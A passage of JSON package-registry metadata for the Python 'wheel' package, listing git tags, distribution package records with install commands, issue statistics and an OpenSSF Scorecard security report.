osts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:26.022Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":21.468306824414324,"stargazers_count":6.918436104364177,"forks_count":5.829350466191334,"average":8.554023348742458},"purl":"pkg:apk/alpine/py3-wheel-doc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.12","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel-doc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel-doc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel-doc/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/packages/py3-wheel-doc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/packages/py3-wheel-doc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/packages/py3-wheel-doc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/packages/py3-wheel-doc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/packages/py3-wheel-doc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/packages/py3-wheel-doc/codemeta","maintainers":[{"uuid":"antoine.fontaine@epfl.ch","login":null,"name":"Antoine Fontaine","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Antoine Fontaine","packages_count":5,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Antoine Fontaine","role":null,"created_at":"2023-02-07T16:56:12.873Z","updated_at":"2023-02-07T16:56:12.873Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/maintainers/antoine.fontaine@epfl.ch/packages"}],"registry":{"name":"alpine-v3.12","url":"https://pkgs.alpinelinux.org/packages?branch=v3.12","ecosystem":"alpine","default":false,"packages_count":12763,"maintainers_count":216,"namespaces_count":2,"keywords_count":1443,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":482},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.748Z","updated_at":"2026-06-10T05:16:20.001Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.12/namespaces"}},{"id":13572903,"name":"wheel","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/pypa/wheel","licenses":null,"normalized_licenses":[],"repository_url":"https://github.com/pypa/wheel","keywords_array":["universe/misc"],"namespace":"universe","versions_count":1,"first_release_published_at":"2026-02-11T07:56:48.747Z","latest_release_published_at":"2026-02-11T07:56:48.747Z","latest_release_number":"0.38.4-1","last_synced_at":"2026-03-11T16:10:12.644Z","created_at":"2026-02-11T07:56:48.395Z","updated_at":"2026-03-11T16:10:12.645Z","registry_url":"https://launchpad.net/ubuntu/+source/wheel","install_command":"apt-get install wheel","documentation_url":null,"metadata":{"component":"universe","architecture":"all","priority":"optional","binary":"python3-wheel, python-wheel-common, python3-wheel-whl","standards_version":"4.6.1","maintainer":"Debian Python Team \u003cteam+python@tracker.debian.org\u003e","build_depends":"debhelper-compat (= 13), dh-python, python3-all-dev, python3-pytest \u003c!nocheck\u003e, python3-pytest-cov \u003c!nocheck\u003e, python3-setuptools, python3-sphinx \u003c!nodoc\u003e, tox \u003c!nocheck\u003e","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{},"repo_metadata_updated_at":"2026-02-11T14:59:08.221Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/wheel?arch=source\u0026distro=ubuntu-23.04\u0026repository_url=https://launchpad.net/ubuntu/lunar","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/wheel/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/wheel/codemeta","maintainers":[],"registry":{"name":"ubuntu-23.04","url":"https://launchpad.net/ubuntu/lunar","ecosystem":"ubuntu","default":false,"packages_count":36116,"maintainers_count":0,"namespaces_count":4,"keywords_count":1000,"github":"ubuntu","metadata":{"codename":"lunar","mirror":"http://old-releases.ubuntu.com/ubuntu","funded_packages_count":133},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:49.117Z","updated_at":"2026-06-10T05:17:49.008Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/namespaces"}},{"id":13537056,"name":"wheel","ecosystem":"debian","description":null,"homepage":"https://github.com/pypa/wheel","licenses":null,"normalized_licenses":[],"repository_url":"https://github.com/pypa/wheel","keywords_array":["misc"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-11T00:29:29.189Z","latest_release_published_at":"2026-02-11T00:29:29.189Z","latest_release_number":"0.34.2-1","last_synced_at":"2026-03-14T10:10:11.552Z","created_at":"2026-02-11T00:29:28.994Z","updated_at":"2026-03-14T10:10:11.552Z","registry_url":"https://tracker.debian.org/pkg/wheel","install_command":"apt-get install wheel","documentation_url":"https://packages.debian.org/bullseye/wheel","metadata":{"component":"main","architecture":"all","priority":"optional","binary":"python3-wheel, python-wheel-common","standards_version":"4.5.0","maintainer":"Debian Python Modules Team \u003cpython-modules-team@lists.alioth.debian.org\u003e","build_depends":"debhelper-compat (= 12), dh-python, python3-sphinx, python3-all, python3-setuptools","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{},"repo_metadata_updated_at":"2026-02-11T14:29:10.505Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/debian/wheel?arch=source\u0026distro=debian-11\u0026repository_url=https://packages.debian.org/bullseye","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/debian/wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/debian/wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/debian/wheel/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages/wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages/wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages/wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages/wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages/wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages/wheel/codemeta","maintainers":[],"registry":{"name":"debian-11","url":"https://packages.debian.org/bullseye","ecosystem":"debian","default":false,"packages_count":31268,"maintainers_count":0,"namespaces_count":3,"keywords_count":764,"github":"debian","metadata":{"codename":"bullseye","funded_packages_count":100},"icon_url":"https://github.com/debian.png","created_at":"2026-02-04T11:01:49.702Z","updated_at":"2026-06-10T05:17:51.942Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/namespaces"}},{"id":8663603,"name":"py3-wheel","ecosystem":"alpine","description":"built-package format for Python","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2023-11-28T22:45:22.000Z","latest_release_published_at":"2023-11-28T22:45:22.000Z","latest_release_number":"0.42.0-r0","last_synced_at":"2026-04-02T15:49:09.268Z","created_at":"2023-12-20T10:00:44.784Z","updated_at":"2026-04-02T15:49:09.269Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.19/main/x86_64/py3-wheel","install_command":"apk add py3-wheel","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release 